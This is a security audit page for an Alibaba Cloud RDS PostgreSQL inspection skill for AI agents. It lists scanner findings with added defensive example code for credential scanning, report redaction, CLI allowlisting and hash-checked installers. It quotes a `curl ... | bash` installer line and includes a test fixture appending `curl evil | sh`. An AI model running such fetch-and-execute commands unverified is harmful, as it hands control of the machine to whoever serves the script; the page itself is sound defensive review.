
Security audit

Alibabacloud Rds Postgresql Inspection

Security checks across malware telemetry and agentic risk

Overview

This skill is primarily an Alibaba Cloud RDS PostgreSQL inspection tool, but it also modifies local Aliyun CLI and plugin state and writes sensitive report data to disk. Both behaviours deserve review before installation.

Install only if you are comfortable with the skill running Aliyun CLI commands, installing or updating Aliyun CLI plugins, and writing detailed inspection reports locally. Run it under a least-privilege, read-only RAM identity or temporary (STS) credentials rather than a long-lived access key; avoid pasting long-lived secrets into commands, since they persist in shell history and process listings; protect or delete the generated report directories; and note that opening the HTML reports loads JavaScript from a third-party CDN.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Output Handling: Unvalidated Output Injection, Cross-Context Output, Unbounded Output
  • Behavioral AST: exec() Call, eval() Call, Dynamic Import
Findings (13)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
        print(f'  📦 Install {plugin}...', end=' ', flush=True)
        try:
            # CLI 3.3.16+ Must use the --name argument
            install_result = subprocess.run(
                ['aliyun', 'plugin', 'install', '--name', plugin],
                capture_output=True, text=True, timeout=120
            )
Confidence
86% confidence
Finding
install_result = subprocess.run( ['aliyun', 'plugin', 'install', '--name', plugin], capture_output=True, text=True, timeout=120 )
Note: the call passes an explicit argument list without shell=True, so no shell parses it. What it does execute is the Aliyun CLI's plugin installer, with whatever value `plugin` holds at that point; the reviewable risk is the plugin fetch and install itself (code pulled from the network and written into the CLI's plugin directory), and the need to allowlist the plugin name before it reaches the CLI, rather than shell injection.

Intent-Code Divergence

Medium
Confidence
92% confidence
Finding
The document asserts the skill is read-only, but immediately discloses a non-read operation, `das create-storage-analysis-task`, which can create or schedule work in the target environment. This is dangerous because operators may grant access or approve execution under a false assumption of zero side effects, weakening change-control and least-privilege review.

Intent-Code Divergence

Medium
Confidence
90% confidence
Finding
The skill claims a read-only posture but includes logic to install CLI plugins before inspection. That mismatch weakens operator trust boundaries and introduces a supply-chain and arbitrary code execution surface that is not necessary for data collection.

Missing User Warnings

Medium
Confidence
94% confidence
Finding
The guide provides concrete examples for configuring long-lived access keys via command-line flags and environment variables, which can expose secrets through shell history, process listings, CI logs, or persisted local configuration files. Although the document later mentions best practices, the examples normalize insecure credential handling without an immediate warning at the point of use.
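As an added illustration of the finding above (example code written for this audit page, not part of the skill), the scanner below walks shell-history or CI-log lines and flags the credential-handling patterns the finding describes: a secret passed as a CLI flag, a secret exported into the environment, and a long-lived AccessKey ID on a command line. The sample lines are constructed and contain no real keys; the `aliyun configure set` flag names and the `ALIBABA_CLOUD_*` environment variable names are assumed from the CLI's documented usage, and the "LTAI" / "STS." prefixes are used as a heuristic for long-lived versus temporary key IDs.

```python
import re
from dataclasses import dataclass

# Constructed sample of shell-history / CI-log lines; none of these values are real keys.
# Flag names follow `aliyun configure set` (assumed from its documented usage).
SAMPLE_LINES = [
    "aliyun configure set --profile prod --mode AK "
    "--access-key-id LTAI5tExampleKeyId0001 --access-key-secret ExampleSecretValue1234567890",
    "export ALIBABA_CLOUD_ACCESS_KEY_SECRET=ExampleSecretValue1234567890",
    "aliyun rds DescribeDBInstances --RegionId cn-hangzhou",
    "aliyun configure set --profile tmp --mode StsToken --access-key-id STS.ExampleTemporaryId "
    "--access-key-secret ExampleStsSecret --sts-token ExampleSessionToken",
]

# Heuristic: long-lived Alibaba Cloud AccessKey IDs start with "LTAI"; STS temporary IDs start with "STS.".
LONG_LIVED_KEY_ID = re.compile(r"\bLTAI[A-Za-z0-9]{12,}\b")
SECRET_FLAG = re.compile(r"(--access-key-secret)([ =])(\S+)")
TOKEN_FLAG = re.compile(r"(--sts-token)([ =])(\S+)")
SECRET_ENV = re.compile(r"(ALIBABA_CLOUD_ACCESS_KEY_SECRET)=(\S+)")
SHORT_LIVED_MARKERS = ("--sts-token", "ALIBABA_CLOUD_SECURITY_TOKEN=", "STS.")


@dataclass
class Exposure:
    line_no: int
    rule: str
    severity: str
    redacted: str  # the offending line with secret material masked, safe to put in a report


def redact(line: str) -> str:
    """Mask secret values so the finding itself does not re-leak them."""
    for pattern in (SECRET_FLAG, TOKEN_FLAG):
        line = pattern.sub(lambda m: f"{m.group(1)}{m.group(2)}***", line)
    return SECRET_ENV.sub(lambda m: f"{m.group(1)}=***", line)


def scan_lines(lines):
    """Return one Exposure per insecure credential-handling pattern found."""
    findings = []
    for n, line in enumerate(lines, 1):
        # A secret bound to an STS token expires on its own, so the exposure window is short.
        short_lived = any(marker in line for marker in SHORT_LIVED_MARKERS)
        if SECRET_FLAG.search(line):
            findings.append(Exposure(n, "secret-on-command-line",
                                     "low" if short_lived else "high", redact(line)))
        if SECRET_ENV.search(line):
            findings.append(Exposure(n, "secret-in-env-assignment",
                                     "low" if short_lived else "medium", redact(line)))
        if LONG_LIVED_KEY_ID.search(line):
            # The ID alone is not a secret, but it proves a permanent key is in use.
            findings.append(Exposure(n, "long-lived-key-id", "medium", redact(line)))
    return findings


if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LINES):
        print(f"line {f.line_no}: {f.severity:<6} {f.rule:<26} {f.redacted}")
```

Running it over the sample flags the long-lived profile twice (secret on the command line, permanent key ID in use), the exported secret once, and the STS profile only at low severity, while the plain DescribeDBInstances call produces nothing.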

Missing User Warnings

Medium
Confidence
96% confidence
Finding
The generated reports and JSON outputs persist sensitive operational data to disk, including instance identifiers, networking metadata, alert history, and truncated SQL from slow logs. In a shared workstation, CI runner, or support environment, these artifacts can expose confidential infrastructure and query information to unauthorized readers.
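One way to blunt the finding above, as added example code for this page (not the skill's own report writer): redact slow-log SQL down to its shape before it is persisted, drop network metadata a report reader does not need, and create the report directory and files owner-only. The sample report, its identifiers and the field names in DROP_KEYS are constructed for the example.

```python
import json
import os
import re
import tempfile

# Constructed sample of the kind of per-instance data the finding describes; identifiers are fake.
SAMPLE_REPORT = {
    "instance_id": "pgm-example0001",
    "vpc_id": "vpc-example0001",
    "private_ip": "10.0.0.1",  # assumed field name, used to show key-level removal
    "slow_logs": [
        {"duration_ms": 1830,
         "sql": "SELECT * FROM users WHERE email = 'alice@example.com' AND id = 42"},
    ],
}

# Keys whose values add nothing for a reader of a shared report (assumed names).
DROP_KEYS = {"private_ip", "connection_string", "security_ips"}
STRING_LITERAL = re.compile(r"'(?:[^'\\]|\\.)*'")
NUMBER_LITERAL = re.compile(r"\b\d+(?:\.\d+)?\b")


def redact_sql(sql: str) -> str:
    """Keep the query shape (tables, columns, operators) but strip bound data."""
    return NUMBER_LITERAL.sub("?", STRING_LITERAL.sub("'?'", sql))


def redact_report(report: dict) -> dict:
    out = json.loads(json.dumps(report))  # deep copy; never mutate the caller's data
    for key in DROP_KEYS:
        out.pop(key, None)
    for entry in out.get("slow_logs", []):
        if isinstance(entry.get("sql"), str):
            entry["sql"] = redact_sql(entry["sql"])
    return out


def write_report(directory: str, name: str, report: dict) -> str:
    """Write a redacted JSON report readable only by the current user."""
    old_umask = os.umask(0o077)  # everything created below is owner-only
    try:
        os.makedirs(directory, mode=0o700, exist_ok=True)
        os.chmod(directory, 0o700)  # makedirs leaves an existing directory's mode alone
        path = os.path.join(directory, name)
        with open(path, "w", encoding="utf-8") as fh:
            json.dump(redact_report(report), fh, indent=2)
    finally:
        os.umask(old_umask)
    return path


def demo() -> dict:
    """Write SAMPLE_REPORT into a fresh temp directory and describe what landed on disk."""
    base = tempfile.mkdtemp()
    path = write_report(os.path.join(base, "reports"), "pgm-example0001.json", SAMPLE_REPORT)
    with open(path, encoding="utf-8") as fh:
        data = json.load(fh)
    return {
        "sql": data["slow_logs"][0]["sql"],
        "keys": sorted(data),
        "file_private": os.stat(path).st_mode & 0o077 == 0,
        "dir_private": os.stat(os.path.dirname(path)).st_mode & 0o077 == 0,
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The umask is restored in a finally block so a failure mid-write does not leave the process with a tighter mask than the caller expects; the explicit chmod on the directory matters because makedirs does not touch the mode of a directory that already exists.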

Missing User Warnings

Low
Confidence
88% confidence
Finding
The per-instance HTML report loads ECharts from a third-party CDN when the report is opened. That causes report viewers to contact an external domain and trust remote JavaScript, which can leak viewing activity and expose users to supply-chain compromise if the CDN content is tampered with.

Missing User Warnings

Low
Confidence
88% confidence
Finding
The summary report also imports third-party JavaScript from a CDN, creating the same privacy and supply-chain risk for anyone opening the file. Because the report contains sensitive infrastructure summaries, external fetches are especially undesirable in an inspection context.
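Both CDN findings above come down to the same check: does a generated HTML file load script from outside the machine, and if so, does it at least pin it with Subresource Integrity? The code below is an added example for this page, not the skill's report generator. It lists external script tags (with whether an integrity attribute is present) and rewrites them to vendored local copies. The sample HTML and its CDN host (a .invalid placeholder) are constructed; the page does not name the real CDN.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample resembling a generated report; the CDN host is a placeholder (.invalid TLD).
SAMPLE_HTML = """<!doctype html><html><head><meta charset="utf-8">
<script src="https://cdn.example-cdn.invalid/echarts/5.4.3/echarts.min.js"></script>
<script src="./vendor/report.js"></script>
</head><body><div id="chart"></div>
<script>window.onload = function () { /* render charts */ };</script>
</body></html>"""


class ScriptCollector(HTMLParser):
    """Record every <script src=...> together with whether it carries an integrity attribute."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        attrs = {k.lower(): v for k, v in attrs}
        if attrs.get("src"):
            self.scripts.append((attrs["src"], bool(attrs.get("integrity"))))


def external_scripts(html: str, allowed_hosts=()):
    """Return (src, has_sri) for each script fetched from a host outside allowed_hosts."""
    collector = ScriptCollector()
    collector.feed(html)
    found = []
    for src, has_sri in collector.scripts:
        parsed = urlparse(src)
        # Absolute http(s) URLs and protocol-relative "//host/..." URLs leave the local machine.
        if parsed.scheme in ("http", "https") or src.startswith("//"):
            if parsed.netloc not in allowed_hosts:
                found.append((src, has_sri))
    return found


def localize_scripts(html: str, replacements: dict) -> str:
    """Point remote script tags at vendored local copies (the copies must ship with the report)."""
    for remote, local in replacements.items():
        html = re.sub(r'src=(["\'])' + re.escape(remote) + r'\1', f'src="{local}"', html)
    return html


if __name__ == "__main__":
    for src, has_sri in external_scripts(SAMPLE_HTML):
        print(f"external script {src} (SRI: {'yes' if has_sri else 'no'})")
    fixed = localize_scripts(SAMPLE_HTML, {
        "https://cdn.example-cdn.invalid/echarts/5.4.3/echarts.min.js": "./vendor/echarts.min.js"})
    print("after localizing:", external_scripts(fixed))
```

Vendoring the chart library next to the report removes both the privacy leak (no request leaves the workstation when the file is opened) and the tampering exposure; where vendoring is not possible, an integrity attribute on the remote tag at least fails closed if the CDN content changes.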

Unrestricted Tool Access

Medium
Category
Excessive Agency
Content
## Usage

**You do not need to run any command manually.** Simply describe the request in natural language.

### Example Prompts
Confidence
78% confidence
Finding
run any command
Note: the match is on the README sentence "You do not need to run any command manually", which says the agent issues the CLI commands on the user's behalf; it is not a documented grant of unrestricted tool access. The point a reviewer should take from it is that the skill's tool calls are driven by free-form natural-language requests rather than by an explicit, bounded list of commands.

Unvalidated Output Injection

High
Category
Output Handling
Content
    # Fetch the list of installed plugins
    try:
        result = subprocess.run(
            ['aliyun', 'plugin', 'list'],
            capture_output=True, text=True, timeout=30
        )
Confidence
95% confidence
Finding
subprocess.run( ['aliyun', 'plugin', 'list'], capture_output
Note: the arguments here are fixed literals in list form with no shell=True, so nothing is injected into the command itself. The output-handling concern is downstream: the captured stdout is CLI output that the skill parses to decide which plugins to install, and it should be treated as untrusted input (size-bounded, parsed strictly) rather than as trusted text.

Unvalidated Output Injection

High
Category
Output Handling
Content
        print(f'  📦 Install {plugin}...', end=' ', flush=True)
        try:
            # CLI 3.3.16+ Must use the --name argument
            install_result = subprocess.run(
                ['aliyun', 'plugin', 'install', '--name', plugin],
                capture_output=True, text=True, timeout=120
            )
Confidence
95% confidence
Finding
subprocess.run( ['aliyun', 'plugin', 'install', '--name', plugin], capture_output

Unvalidated Output Injection

High
Category
Output Handling
Content
    # Verifying plugin installation
    print('🔍 Verifying plugin installation...', flush=True)
    try:
        result = subprocess.run(
            ['aliyun', 'plugin', 'list'],
            capture_output=True, text=True, timeout=30
        )
Confidence
95% confidence
Finding
subprocess.run( ['aliyun', 'plugin', 'list'], capture_output

Unvalidated Output Injection

High
Category
Output Handling
Content
    # Retry loop (handles throttling and timeouts)
    for attempt in range(_CLI_MAX_RETRIES):
        try:
            result = subprocess.run(cmd, capture_output=True, text=True,
                                    timeout=timeout or _CLI_TIMEOUT)
            if result.returncode == 0:
                try:
Confidence
95% confidence
Finding
subprocess.run(cmd, capture_output
Note: this generic helper runs whatever `cmd` its callers assemble, and the excerpt shows neither how `cmd` is built nor how the JSON result is parsed. Since `cmd` is passed through as-is (no shell=True is visible), the question for review is the provenance of each element of `cmd`, in particular any value that originates from instance data or from a natural-language request.
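The two Intent-Code Divergence findings (a "read-only" skill that can call `das create-storage-analysis-task` and that installs plugins) and the four subprocess findings point at one missing piece: a gate between the agent and the CLI. The wrapper below is an added example for this page, not the skill's code. It enforces an assumed read-only policy (query-style API actions on an allowlisted set of products), validates every argv token and plugin name before it reaches the CLI, never uses shell=True, and treats the CLI's stdout as untrusted by bounding it and insisting on a JSON object. The product list, the verb allowlist and the fake runner's JSON are constructed for the example; the `aliyun <product> <Action> --Key value` argv shape is assumed from the CLI's usage.

```python
import json
import re
import subprocess

# Policy (assumed, not the skill's own): a "read-only" inspection may only call query-style
# API actions on these products, and every argv token must be plain CLI material.
ALLOWED_PRODUCTS = {"rds", "das", "vpc"}
READ_ONLY_ACTION = re.compile(r"^(Describe|List|Get|Query)[A-Za-z0-9]*$")
SAFE_TOKEN = re.compile(r"^[A-Za-z0-9_.:/,=-]+$")
PLUGIN_NAME = re.compile(r"^[a-z][a-z0-9-]{0,63}$")


class PolicyViolation(Exception):
    pass


def normalize_action(action: str) -> str:
    """Fold the CLI's hyphenated spelling (create-storage-analysis-task) into the API name."""
    return "".join(part[:1].upper() + part[1:] for part in action.split("-"))


def build_command(product: str, action: str, params: dict) -> list:
    """Return argv for `aliyun <product> <Action> --Key value ...` or raise PolicyViolation."""
    if product not in ALLOWED_PRODUCTS:
        raise PolicyViolation(f"product not allowed: {product!r}")
    action = normalize_action(action)
    if not READ_ONLY_ACTION.match(action):
        raise PolicyViolation(f"non-read action refused: {action!r}")
    argv = ["aliyun", product, action]
    for key, value in params.items():
        value = str(value)
        # Reject anything that could be parsed as an option or carry shell metacharacters;
        # the list form of subprocess.run never invokes a shell, but the CLI still parses argv.
        if not SAFE_TOKEN.match(key) or not SAFE_TOKEN.match(value) or value.startswith("-"):
            raise PolicyViolation(f"unsafe parameter {key!r}={value!r}")
        argv += [f"--{key}", value]
    return argv


def plugin_install_argv(name: str) -> list:
    """argv for `aliyun plugin install --name <plugin>` with the name allowlisted first."""
    if not PLUGIN_NAME.match(name):
        raise PolicyViolation(f"plugin name refused: {name!r}")
    return ["aliyun", "plugin", "install", "--name", name]


def allowed(product: str, action: str, params: dict) -> bool:
    try:
        build_command(product, action, params)
        return True
    except PolicyViolation:
        return False


def parse_cli_json(stdout: str, max_bytes: int = 8 * 1024 * 1024) -> dict:
    """Treat CLI stdout as untrusted: bound its size and insist on a JSON object."""
    if len(stdout) > max_bytes:
        raise ValueError("CLI output exceeds size bound")
    data = json.loads(stdout)
    if not isinstance(data, dict):
        raise ValueError(f"expected a JSON object, got {type(data).__name__}")
    return data


def run_read_only(product, action, params, runner=subprocess.run, timeout=60) -> dict:
    argv = build_command(product, action, params)
    result = runner(argv, capture_output=True, text=True, timeout=timeout)  # never shell=True
    if result.returncode != 0:
        raise RuntimeError(f"{' '.join(argv)} failed: {result.stderr.strip()[:200]}")
    return parse_cli_json(result.stdout)


def fake_runner(argv, **kwargs):
    """Stand-in for subprocess.run so the example runs offline; the JSON is constructed."""
    payload = {"Items": {"DBInstance": [{"DBInstanceId": "pgm-example0001", "Engine": "PostgreSQL"}]}}
    return subprocess.CompletedProcess(argv, 0, stdout=json.dumps(payload), stderr="")


if __name__ == "__main__":
    print(run_read_only("rds", "DescribeDBInstances", {"RegionId": "cn-hangzhou"}, runner=fake_runner))
    print("create-storage-analysis-task allowed:", allowed("das", "create-storage-analysis-task", {}))
```

With this in front of the CLI, the scheduling call the document discloses is refused by the verb allowlist, a parameter such as `--profile` smuggled in as a value is refused because it starts with a dash, and a malformed plugin name never reaches `aliyun plugin install`.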

External Script Fetching

High
Category
Supply Chain
Content
**Pre-check: Aliyun CLI >= 3.3.3 required**
> Run `aliyun version` to verify the version is >= 3.3.3. If the CLI is missing or outdated,
> run `curl -fsSL https://aliyuncli.alicdn.com/setup.sh | bash` to install or upgrade,
> or follow https://help.aliyun.com/zh/cli/ for installation instructions.

**Pre-check: Aliyun CLI plugin update required**
Confidence
97% confidence
Finding
curl -fsSL https://aliyuncli.alicdn.com/setup.sh | bash
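The piped `curl | bash` executes whatever the server returns, at whatever point the transfer stops. The added example below (written for this page, not part of the skill or of the Aliyun CLI's installer) shows the replacement a practitioner would use: download to memory with a size bound, compare the SHA-256 against a digest pinned out of band, and only then execute the script from a private temporary file. The installer bytes here are a constructed stand-in and the pinned digest is computed from them for the demo; a real deployment obtains the digest from a trusted channel, never from the same URL as the script. The page does not publish a digest for setup.sh, so none is assumed.

```python
import hashlib
import hmac
import os
import subprocess
import tempfile
from urllib.request import urlopen

# Constructed stand-in for the installer; EXPECTED_SHA256 is derived from it for the offline demo
# and is not a published value for the real setup.sh.
CONSTRUCTED_SCRIPT = b"#!/bin/sh\necho 'installer stand-in: would install the aliyun CLI here'\n"
EXPECTED_SHA256 = hashlib.sha256(CONSTRUCTED_SCRIPT).hexdigest()
MAX_BYTES = 5 * 1024 * 1024


def http_fetch(url: str) -> bytes:
    """Default fetcher: read at most MAX_BYTES + 1 so an oversized body is detectable."""
    with urlopen(url, timeout=30) as resp:  # real network; not used by the offline demo
        return resp.read(MAX_BYTES + 1)


def fetch_verified(url: str, expected_sha256: str, fetch=http_fetch) -> bytes:
    """Download the installer and refuse it unless its SHA-256 matches the pinned digest."""
    data = fetch(url)
    if len(data) > MAX_BYTES:
        raise ValueError("installer larger than the expected size bound")
    actual = hashlib.sha256(data).hexdigest()
    if not hmac.compare_digest(actual, expected_sha256.lower()):
        raise ValueError(f"digest mismatch: expected {expected_sha256}, got {actual}")
    return data


def digest_matches(url: str, expected_sha256: str, fetch=http_fetch) -> bool:
    try:
        fetch_verified(url, expected_sha256, fetch)
        return True
    except ValueError:
        return False


def install_from(url: str, expected_sha256: str, fetch=http_fetch, run=subprocess.run) -> int:
    """Verified replacement for `curl ... | bash`: verify first, then execute from a private file."""
    script = fetch_verified(url, expected_sha256, fetch)
    fd, path = tempfile.mkstemp(suffix=".sh")  # created 0600, owned by us
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(script)
        os.chmod(path, 0o700)
        completed = run(["bash", path], check=True, capture_output=True, text=True)
        return completed.returncode
    finally:
        os.unlink(path)


def fake_fetch(url: str) -> bytes:
    """Offline stand-in for http_fetch."""
    return CONSTRUCTED_SCRIPT


def fake_run(argv, **kwargs):
    """Stand-in for subprocess.run so the demo does not execute anything."""
    return subprocess.CompletedProcess(argv, 0, stdout="", stderr="")


if __name__ == "__main__":
    url = "https://example.invalid/setup.sh"
    print("digest ok:", digest_matches(url, EXPECTED_SHA256, fake_fetch))
    print("tampered ok:", digest_matches(url, EXPECTED_SHA256,
                                         lambda u: CONSTRUCTED_SCRIPT + b"curl evil | sh\n"))
    print("exit:", install_from(url, EXPECTED_SHA256, fake_fetch, fake_run))
```

A pinned digest turns a silently modified installer into a hard failure, and writing the whole verified script before executing it removes the partial-execution hazard of piping a stream into bash.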

VirusTotal

VirusTotal findings are pending for this skill version.
